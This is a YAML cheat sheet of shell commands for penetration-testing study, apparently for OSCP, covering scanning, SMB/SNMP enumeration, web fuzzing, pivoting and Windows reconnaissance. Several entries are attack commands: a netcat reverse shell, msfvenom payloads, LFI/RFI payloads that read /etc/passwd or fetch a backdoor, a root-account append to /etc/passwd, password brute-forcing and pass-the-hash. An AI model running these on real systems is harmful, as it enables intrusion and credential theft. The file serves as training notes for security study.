2936 lines
114 KiB
YAML
2936 lines
114 KiB
YAML
title: Commands for Fast Memo Shell
|
||
commands:
|
||
- cmd: nmap -p- --min-rate 10000 192.168.56.30 -Pn
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Fast scan all ports
|
||
- cmd: nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,5986,9389,49668,49670,49671,49673,49674,49687,49750 -sCV 192.168.56.30 -Pn
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Scan with services and versions
|
||
- cmd: sudo nmap -v -p- -sS -sV -A -T5 192.168.1.1
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Syn TCP scan all ports with fingerprint, with fastest timming and verbose output
|
||
- cmd: grc nmap -v -p- -sV -A --min-rate 10000 --max-rtt-timeout 1500ms 192.168.229.201
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: TCP scan all ports with fingerprint fast with colors
|
||
- cmd: sudo nmap -sU -sV -A 192.168.203.199
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: UDP scan
|
||
- cmd: nmap -O -sV -A 192.168.203.199
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: TCP scan with OS fingerprint
|
||
- cmd: nmap -p- -sV -A --script "vuln" 192.168.213.188
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: TCP scan all ports and check for vuln
|
||
- cmd: nmap -sV -p 80,443 --script "vuln" 192.168.50.124
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: TCP scan HTTP/S and check for vuln
|
||
- cmd: nmap -p80,443 --script http-title 192.168.218.0/24 --open -Pn
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: TCP scan HTTP/S and get page titles
|
||
- cmd: nmap -sT -A --top-ports=20 192.168.50.1-253 -oG top-port-sweep.txt
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: TCP connect scan for the top 20 TCP ports
|
||
- cmd: nmap --script http-headers 192.168.50.6
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: scan and check headers with NSE scripts
|
||
- cmd: nmap --script-help http-headers
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: get help about a NSE script
|
||
- cmd: rustscan --ulimit 5000 -a 10.129.102.178 -- -sV
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: fast scan top ports with nmap service version
|
||
- cmd: rustscan --ulimit 5000 -a 10.129.102.178 -- -A -sC -sV
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: fast scan top ports with nmap scripts
|
||
- cmd: rustscan --ulimit 5000 -a 10.129.102.178
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: fast scan top ports
|
||
- cmd: rustscan --ulimit 5000 -r 1-65535 -a 10.129.102.178
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: fast scan all ports
|
||
- cmd: naabu -host 192.168.214.149
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: fast scan a host
|
||
- cmd: naabu -nmap-cli 'nmap -sV' -host 192.168.214.149
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: fast scan a host and nmap service discovery
|
||
- cmd: naabu -nmap-cli 'nmap -sV -sC' -host 192.168.214.149
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: fast scan a host and nmap service discovery and scripts
|
||
- cmd: naabu -nmap-cli 'nmap -sV -sC' -port 1-65535 -host 192.168.214.149
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: fast scan a host of all ports
|
||
- cmd: naabu -nmap-cli 'nmap -sV -sC' -l ip_lists
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: fast scan a list of hosts
|
||
- cmd: naabu -proxy 127.0.0.1:1080 -Pn -host 10.10.104.146
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: scan using proxy socks
|
||
- cmd: Invoke-WebRequest -Proxy "http://192.168.197.224:3128" -uri http://192.168.197.224:8000 -outfile test
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: using proxy on windows
|
||
- cmd: find /usr/share/nmap/scripts/ -type f | sk --preview 'bat -l lua --color=always {}'
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: search a NSE script
|
||
- cmd: nc -nvv -w 1 -z 192.168.50.152 3388-3390
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: TCP scan without nmap
|
||
- cmd: nc -nv -u -z -w 1 192.168.50.149 120-123
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: UDP scan without nmap
|
||
- cmd: nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SMB scan with info
|
||
- cmd: nmap -p 445 --script smb-os-discovery 192.168.212.0/24 --open -oG a; cat a | grep open | cut -d ' ' -f2 | tail -n +2 | xargs -I{} enum4linux {}
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SMB scan with info ip range
|
||
- cmd: sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: UDP scan ip range
|
||
- cmd: gobuster dir -u http://<IP|HOST>/ -w /usr/share/wordlists/dirb/common.txt -t 5
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: enumerate pages on webserver
|
||
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://192.168.232.221/ -f
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteforce directory on webserver
|
||
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -u http://192.168.232.221/ -x txt,html,php,asp,aspx,jsp
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteforce files on webserver
|
||
- cmd: feroxbuster --url http://<IP|Host>/
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: enumerate pages on webserver
|
||
- cmd: feroxbuster --url http://<IP|Host>/ -x pdf,php,txt
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: enumerate pages on webserver (check for pdf, php, txt files)
|
||
- cmd: feroxbuster --url http://192.168.222.46 -w /usr/share/wordlists/dirb/common.txt
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: enumerate pages on webserver using common list
|
||
- cmd: feroxbuster --url http://192.168.193.46/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: enumerate pages on webserver using very big list
|
||
- cmd: ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://192.168.240.46/FUZZ
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: enumerate pages on webserver
|
||
- cmd: ffuf -w pins -u "http://10.129.95.191/cdn-cgi/login/admin.php?content=uploads" -b "user=FUZZ2; role=guest" -mc 200
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Fuzz cookie value (bruteforce)
|
||
- cmd: gobuster vhost -u http://<remote_ip> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: discover vhost (virtual host)
|
||
- cmd: wfuzz -c -f sub-fighter -u '<url>' -H 'Host:FUZZ.<domain>' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: discover vhost (virtual host)
|
||
- cmd: wfuzz -c -f sub-fighter -u '<url>' -H 'Host:FUZZ.<domain>' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw <word_to_hide>
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: discover vhost (virtual host), get rid of non-existent false positives
|
||
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -u http://192.168.1.10:8000/ [-f]
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: discover directories
|
||
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://192.168.1.10:8000/architecture/
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: discover commons files
|
||
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_words.txt -u http://192.168.1.10:8000/architecture/ -x txt,html,php,asp,aspx,jsp
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: discover files using extensions
|
||
- cmd: ~/hs/tools/enum4linux-ng.py 192.168.194.10
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SMB enumeration
|
||
- cmd: rpcclient -U "MINILAB\\" 192.168.56.30 -N
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: RPC enumeration (enumdomusers, enumdomgroups)
|
||
- cmd: net rpc group members 'Domain Users' -W 'MINILAB' -I '192.168.56.30' -U '%'
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Get all domain users
|
||
- cmd: nmap -Pn -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='minilab',userdb=/usr/share/seclists/Usernames/Names/names.txt" 192.168.56.30
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Get all domain users, when anonymous sessions are not allowed
|
||
- cmd: smbmap -H 192.168.229.210
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SMB list all shares with available permissions
|
||
- cmd: netexec smb 192.168.56.30
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check SMB access
|
||
- cmd: netexec smb 192.168.56.30 -u bob -p 'superman'
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check SMB access with creds
|
||
- cmd: netexec smb 192.168.56.30 -u bob -p 'superman' --shares
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check SMB shares with creds
|
||
- cmd: netexec smb 192.168.56.30 -u bob -p 'superman' -M spider_plus
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check SMB shares with creds and try to find interesting files
|
||
- cmd: crackmapexec smb 192.168.56.30 -u 'a' -p '' --shares
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: list guest access on shares
|
||
- cmd: smbclient --no-pass -L //192.168.194.10
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: list unprotected SMB shares
|
||
- cmd: smbclient --no-pass //192.168.194.10/offsec
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: list under unprotected SMB share
|
||
- cmd: smbclient //192.168.50.195/share -c 'put config.Library-ms'
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Uploading our Library file to the SMB share on the HR137 machine
|
||
- cmd: smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Using smbclient with NTLM hash
|
||
- cmd: smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b ; dir ; get secrets.txt
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using smbclient with NTLM hash
|
||
- cmd: smbmap -u WEB02\mark -p OathDeeplyReprieve91 -H 192.168.246.248
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SMB list all shares with available permissions
|
||
- cmd: impacket-smbclient WEB02\mark@192.168.246.248 [-hashes LMHASH:NTHASH]
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: connect to smb share
|
||
- cmd: smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing SMB shares through the SSH local port forward running on CONFLUENCE01.
|
||
- cmd: smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234 ; ls ; get Provisioning.ps1
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing files in the scripts share, using smbclient over our SSH local port forward running on CONFLUENCE01.
|
||
- cmd: proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
|
||
lang: sh
|
||
tags: oscp
|
||
desc: smbclient connecting to HRSHARES through the SOCKS proxy using Proxychains.
|
||
- cmd: smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to the SMB share on HRSHARES, without any explicit forwarding.
|
||
- cmd: smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to HRSHARES's SMB server through the dnscat2 port forward.
|
||
- cmd: sudo mount -t cifs //192.168.194.10/offsec /mnt/smb
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: mount a SMB share
|
||
- cmd: sudo mount -t cifs //192.168.1.1/USB1 /mnt/livebox/ -o username=guest,password="",vers=1.0
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: mount a SMB share (guest)
|
||
- cmd: snmp-check 192.168.212.151
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration
|
||
- cmd: snmpwalk -Oa -c public -v1 -t 10 192.168.212.151
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration
|
||
- cmd: echo -e "public\nprivate\nmanager" > community
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration generate community file
|
||
- cmd: for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration generate ip list file
|
||
- cmd: onesixtyone -c community -i ips
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration
|
||
- cmd: snmpwalk -c public -v1 -t 10 192.168.50.151
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration
|
||
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration list entire MIB tree
|
||
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration list all the currently running processes
|
||
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration list all the current TCP listening ports
|
||
- cmd: snmpwalk -c public -v1 -t 10 192.168.244.149 NET-SNMP-EXTEND-MIB::nsExtendObjects
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SNMP enumeration of Extending Services
|
||
- cmd: apt-get install snmp-mibs-downloader; download-mibs
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: update some MIBs to the latest version or to download extra vendor MIBs.
|
||
- cmd: impacket-mssqlclient -port 1433 -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.129.129.69
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: connect to a MSSQL Server
|
||
- cmd: curl "http://192.168.50.16/cgi-bin/../../../../etc/passwd"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check Directory Traversals
|
||
- cmd: curl "http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check Directory Traversals
|
||
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check Directory Traversals
|
||
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check Local File Inclusion
|
||
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check Local File Inclusion with PHP Wrappers
|
||
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check Local File Inclusion with PHP Wrappers
|
||
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check Local File Inclusion with PHP Wrappers
|
||
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check Remote File Inclusion
|
||
- cmd: remmina -c rdp://username@server
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: connect to a remote desktop in RDP
|
||
- cmd: nc -nvlp 4444
|
||
lang: sh
|
||
tags: OSCP reverse-shell
|
||
desc: Bind netcat for reverse shell
|
||
- cmd: rlwrap -cAr nc -lnvp 443
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Bind netcat for reverse shell with completion
|
||
- cmd: source ~/.virtualenvs/wsgidav/bin/activate
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: use a python venv
|
||
- cmd: ~/hs/tools/powershell_base64_enc.sh
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: encode a powershel payload in base64
|
||
- cmd: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.157 4444 >/tmp/f
|
||
lang: sh
|
||
tags: OSCP reverse-shell
|
||
desc: bash reverse shell payload
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.165 LPORT=4445 -f exe-service > a.exe
|
||
lang: sh
|
||
tags: OSCP reverse-shell
|
||
desc: generate a windows service executable reverse shell
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.165 LPORT=4445 -f exe > a.exe
|
||
lang: sh
|
||
tags: OSCP reverse-shell
|
||
desc: generate a windows executable reverse shell
|
||
- cmd: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.45.204;set LPORT 443;run;"
|
||
lang: sh
|
||
tags: OSCP reverse-shell
|
||
desc: launch a meterpreter listener
|
||
- cmd: curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Command injection POST command as data
|
||
- cmd: curl -s https://http.kali.org/README.mirrorlist | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep 'README$' | sort | uniq | xargs dirname | xargs -I {} sh -c 'echo $(curl -r 0-102400 -s -w %{speed_download} -o /dev/null {}/dists/kali-rolling/Contents-amd64.gz) {}' | sort -g -r
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: List kali mirrors and speed sorted
|
||
- cmd: exiftool -a -u old.pdf
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Print all metadata from a file
|
||
- cmd: mysql -u root -p'root' -h 192.168.50.16 -P 3306
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: connect to mysql
|
||
- cmd: chezmoi git pull -- --autostash --rebase && chezmoi diff
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: Pull the latest changes from your repo and see what would change, without actually applying the changes
|
||
- cmd: sudo setcap 'cap_net_bind_service=+ep' /usr/bin/python3.11
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: Allow bind for port < 1024, set capability CAP_NET_BIND_SERVICE
|
||
- cmd: /usr/bin/impacket-smbserver -smb2support share `pwd`
|
||
lang: sh
|
||
tags: OSCP CUSTOM
|
||
desc: 'share directory using SMB protocol, client cmd: net use z: \\ip\share'
|
||
- cmd: responder -I tap0
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: launch responder on interface tap0
|
||
- cmd: sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: use post.txt request file, "item" vulnerable item, with a custom writable dir
|
||
- cmd: sqlmap --flush-sessiony
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: remove the previous session
|
||
- cmd: sudo grc tcpdump -l -n -i tun0 "dst net 192.168.45.152 && ((tcp[tcpflags] & (tcp-syn) != 0) || not tcp )"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: dump connection to current host (troubleshooting reverse shell)
|
||
- cmd: sudo grc tcpdump -X -vvv -l -n -i tun0 "dst net 192.168.45.152 && ((tcp[tcpflags] & (tcp-syn) != 0) || not tcp )"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: dump connection to current host with details (troubleshooting reverse shell)
|
||
- cmd: msfdb init
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: init metasploit database
|
||
- cmd: hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: crack password using rules
|
||
- cmd: john --wordlist=ssh.passwords --rules=sshRules ssh.hash
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteForce Hash with John
|
||
- cmd: john --wordlist=/usr/share/wordlists/rockyou.txt --rules=sshRules -stdout > passwords.txt
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: generate wordlist
|
||
- cmd: hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteForce NTLM hash
|
||
- cmd: hashcat --help | grep -i "ntlm"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: search for hashcat hash code
|
||
- cmd: hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteForce Net-NTLMv2 hash
|
||
- cmd: hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteforce SSH
|
||
- cmd: hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteforce RDP
|
||
- cmd: hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.221.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Invalid username or password"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteforce HTTP post
|
||
- cmd: hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.221.201 http-get /
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteforce HTTP auth basic
|
||
- cmd: legba ssh -T 192.168.195.153 -U usernames.txt -P passwords.txt
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteforce SSH
|
||
- cmd: legba rdp -T 192.168.244.191 -U users -P passwords
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: bruteforce RDP
|
||
- cmd: nslookup mail.megacorptwo.com
|
||
lang: ps1
|
||
tags: OSCP windows
|
||
desc: request DNS
|
||
- cmd: nslookup -type=TXT info.megacorptwo.com 192.168.50.151
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: request DNS sepecific type and resolver
|
||
- cmd: gobuster dir -u http://192.168.238.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Enumerate API (pattern contain "v1 \n v2")
|
||
- cmd: echo 'MS01.oscp.exam' | gobuster vhost -w - -u http://192.168.194.147:8080
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Check if vhost exist
|
||
- cmd: curl -A '' -H 'Host:<domain>' http://<IP>
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Check if vhost exist
|
||
- cmd: find / -user root -perm -002 -type f -not -path "/proc/*" 2>/dev/null
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: find root writables files
|
||
- cmd: routel
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: list all routes
|
||
- cmd: ss -anp
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: list all sockets
|
||
- cmd: ls -lah /etc/cron*
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: list cron files
|
||
- cmd: find / -perm -u=s -type f 2>/dev/null
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: find suid files
|
||
- cmd: grep "CRON" /var/log/syslog
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: get cron logs
|
||
- cmd: echo "root2:$(openssl passwd w00t):0:0:root:/root:/bin/bash" >> /etc/passwd
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: add a user root2 with password w00t
|
||
- cmd: /usr/sbin/getcap -r / 2>/dev/null
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: recursive search / for binaries with capabilities.
|
||
- cmd: whatweb http://192.168.203.48/
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: check server and framework used by a website
|
||
- cmd: searchsploit "HTML Injection exploit WebCT"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: search a exploit
|
||
- cmd: searchsploit -m <ID>
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: download a exploit
|
||
- cmd: impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Using psexec to get an interactive shell
|
||
- cmd: impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: Using wmiexec to get an interactive shell
|
||
- cmd: xfreerdp /u:stephanie /d:corp.com /p:'LegmanTeamBenzoin!!' /cert-ignore /v:192.168.197.75 +clipboard /dynamic-resolution /drive:~/vmshare,vmshare
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: connect to rdp
|
||
- cmd: xfreerdp /u:offsec /p:'lab' /cert-ignore /v:192.168.197.75 +clipboard /dynamic-resolution
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: connect to rdp
|
||
- cmd: swaks --from administrator@supermagicorg.com --to dave.wizard@supermagicorg.com --server 192.168.194.199:587 --auth-user test@supermagicorg.com --auth-pass test --body @msg.txt --attach @config.Library-ms
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: send a email
|
||
- cmd: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/oscp/webdav/
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: launch webdav server
|
||
- cmd: socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: redirect a port and debug
|
||
- cmd: socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: redirect a port
|
||
- cmd: python3 -c 'import pty; pty.spawn("/bin/bash")'
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: enable console ssh interaction in netcat shell
|
||
- cmd: plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: port redirect using plink
|
||
- cmd: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.232.64 connectport=22 connectaddress=10.4.232.215
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: add port redirect using netsh
|
||
- cmd: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.232.64 localport=2222 action=allow
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: add firewall rule using netsh
|
||
- cmd: netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: delete firewall rule using netsh
|
||
- cmd: netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.232.64
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: delete port redirect using netsh
|
||
- cmd: 'alias issh=ssh -o LogLevel=ERROR -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no"'
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: SSH without fingerprint
|
||
- cmd: powershell -ep bypass
|
||
lang: ps1
|
||
tags: OSCP Windows winsetup
|
||
desc: bypass the execution policy
|
||
- cmd: icacls <filename>
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: discretionary access control lists (DACLs) on specified files
|
||
- cmd: whoami
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: obtain username and hostname
|
||
- cmd: whoami /groups
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: Group memberships of the user
|
||
- cmd: Get-LocalUser
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: Display local users (depuis powershell)
|
||
- cmd: Get-LocalGroup
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: Display local groups (depuis powershell)
|
||
- cmd: Get-LocalGroupMember adminteam
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: Display members of the group
|
||
- cmd: systeminfo
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: Information about the operating system and architecture
|
||
- cmd: ipconfig /all
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: Information about the network configuration
|
||
- cmd: netstat -ano
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: Active network connections
|
||
- cmd: Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
|
||
lang: ps1
|
||
tags: OSCP Windows
|
||
desc: Installed applications
|
||
- cmd: Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Installed applications
|
||
- cmd: Get-Process
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Running processes
|
||
- cmd: Get-Process | Select-Object -ExpandProperty Path
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Running processes with path
|
||
- cmd: Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Find in powershell
|
||
- cmd: Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Find in powershell
|
||
- cmd: dir -Recurse | Select-String -pattern "steve"
|
